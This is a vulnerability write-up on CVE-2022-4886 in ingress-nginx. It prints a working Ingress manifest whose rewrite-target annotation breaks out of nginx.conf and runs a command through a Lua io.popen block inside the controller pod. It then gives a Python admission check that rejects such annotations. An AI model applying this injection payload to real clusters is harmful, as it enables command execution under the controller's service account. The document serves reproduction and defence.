CVE-2022-4886: reproducing and analysing command injection through ingress-nginx annotations
Installation

Install ingress-nginx (the deploy manifest for controller release v1.8.4):

```shell
wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/controller-v1.8.4/deploy/static/provider/cloud/deploy.yaml
kubectl apply -f deploy.yaml   # the original used the shell alias "k" for kubectl
```
How it works

The value of the nginx.ingress.kubernetes.io/rewrite-target annotation is copied verbatim into the nginx.conf that the controller generates, as the target of a rewrite directive inside the location block for the Ingress path. Anyone allowed to create Ingress objects can therefore supply a value that completes that directive, closes the enclosing location block with a stray `}`, and appends a new location whose content_by_lua_block executes a command through io.popen. A trailing, unclosed `location /fs/{` swallows the rest of the template's original directive and its closing brace, so the generated configuration still parses. The command runs inside the ingress-nginx controller pod, under the controller's service account, not in the workload behind the Ingress.
```yaml
nginx.ingress.kubernetes.io/rewrite-target: |
  execute-command/ last;   # completes the rewrite directive; redirects every request to /execute-command
  }                        # closes the location block generated by the controller
  # injects a new path that executes a command through a Lua script
  location execute-command/ {
      content_by_lua_block {
          local handle = io.popen("ls -l")
          local result = handle:read("*a")
          handle:close()
          ngx.say(result)
      }
  }
  location /fs/{           # left open so the template's remaining text and closing brace still parse
```
Demonstration

The Ingress deployed for the demonstration is shown below. Once it is applied, any request for the host k8s.evil.me is rewritten to the injected location and answered with the output of `ls -l` from the controller pod.
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-exploit
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/rewrite-target: |
      execute-command/ last;
      }
      location execute-command/ {
          content_by_lua_block {
              local handle = io.popen("ls -l")
              local result = handle:read("*a")
              handle:close()
              ngx.say(result)
          }
      }
      location /fs/{
spec:
  rules:
  - host: k8s.evil.me
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: exploit
            port:
              number: 8080
```
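The root cause in both sections above is that an annotation value reaches nginx.conf unvalidated. The check below, written for this write-up and not part of ingress-nginx, is the kind of pre-admission rule a CI linter or validating webhook can apply to Ingress manifests before the controller ever renders them: it rejects nginx.ingress.kubernetes.io/ values that contain directive- or block-terminating characters (newline, `;`, `{`, `}`, `#`) or that name a Lua directive, and it flags the snippet annotations, which carry raw nginx configuration by design and are better switched off in the controller ConfigMap with allow-snippet-annotations: "false". The two manifests are constructed for the demonstration (the malicious one reuses the annotation from this page); the function names are mine. Newer controller releases (1.9.0 and later) ship their own annotation validator behind the --enable-annotation-validation flag, which enforces the same idea inside the controller.

```python
"""Admission-style check for ingress-nginx annotations that can break out of
the generated nginx.conf (the pattern shown in this write-up).

Added example; not ingress-nginx code. Manifests below are constructed."""
import re

NGINX_PREFIX = "nginx.ingress.kubernetes.io/"

# Annotations whose purpose is to carry raw nginx configuration. They cannot
# be validated character by character; the controller should refuse them
# (ConfigMap key allow-snippet-annotations: "false").
SNIPPET_ANNOTATIONS = {
    NGINX_PREFIX + "configuration-snippet",
    NGINX_PREFIX + "server-snippet",
    NGINX_PREFIX + "stream-snippet",
    NGINX_PREFIX + "modsecurity-snippet",
    NGINX_PREFIX + "auth-snippet",
}

# Characters that end a directive (;), open or close a block ({ }), start a
# comment (#) or a new line. None belong in a rewrite target or any other
# single-token annotation value.
BREAKOUT_CHARS = re.compile(r"[\n\r;{}#]")

# Substrings of directive names that hand control to Lua in the controller pod.
LUA_DIRECTIVES = ("_by_lua_block", "_by_lua_file", "_by_lua")


def risky_annotations(manifest):
    """Return [(annotation, reason), ...] for an Ingress manifest given as a
    dict (what yaml.safe_load produces). An empty list means nothing found."""
    findings = []
    if manifest.get("kind") != "Ingress":
        return findings
    annotations = (manifest.get("metadata") or {}).get("annotations") or {}
    for key, value in annotations.items():
        if not key.startswith(NGINX_PREFIX):
            continue
        text = str(value)
        if key in SNIPPET_ANNOTATIONS:
            findings.append((key, "raw nginx config annotation; disallow it"))
        elif BREAKOUT_CHARS.search(text):
            findings.append((key, "value can terminate the directive or block"))
        elif any(d in text for d in LUA_DIRECTIVES):
            findings.append((key, "value names a Lua directive"))
    return findings


def admit(manifest):
    """True if the manifest may be admitted, False if it must be rejected."""
    return not risky_annotations(manifest)


# Constructed sample: the annotation value from the write-up above.
MALICIOUS_INGRESS = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "ingress-exploit",
        "annotations": {
            "kubernetes.io/ingress.class": "nginx",
            NGINX_PREFIX + "rewrite-target": (
                "execute-command/ last;\n}\nlocation execute-command/ {\n"
                "content_by_lua_block { ... }\n}\nlocation /fs/{\n"
            ),
        },
    },
    "spec": {"rules": [{"host": "k8s.evil.me"}]},
}

# Constructed sample: an ordinary rewrite target used with a regex path.
BENIGN_INGRESS = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "app",
        "annotations": {NGINX_PREFIX + "rewrite-target": "/$2"},
    },
    "spec": {"rules": [{"host": "app.example"}]},
}

if __name__ == "__main__":
    for name, m in (("malicious", MALICIOUS_INGRESS), ("benign", BENIGN_INGRESS)):
        verdict = "admit" if admit(m) else "reject"
        print(f"{name}: {verdict} {risky_annotations(m)}")
```

Run it as a script to see the malicious manifest rejected and the benign one admitted; in a webhook, feed the decoded Ingress object from the AdmissionReview into admit() and return the findings as the denial message so the author sees which annotation was refused.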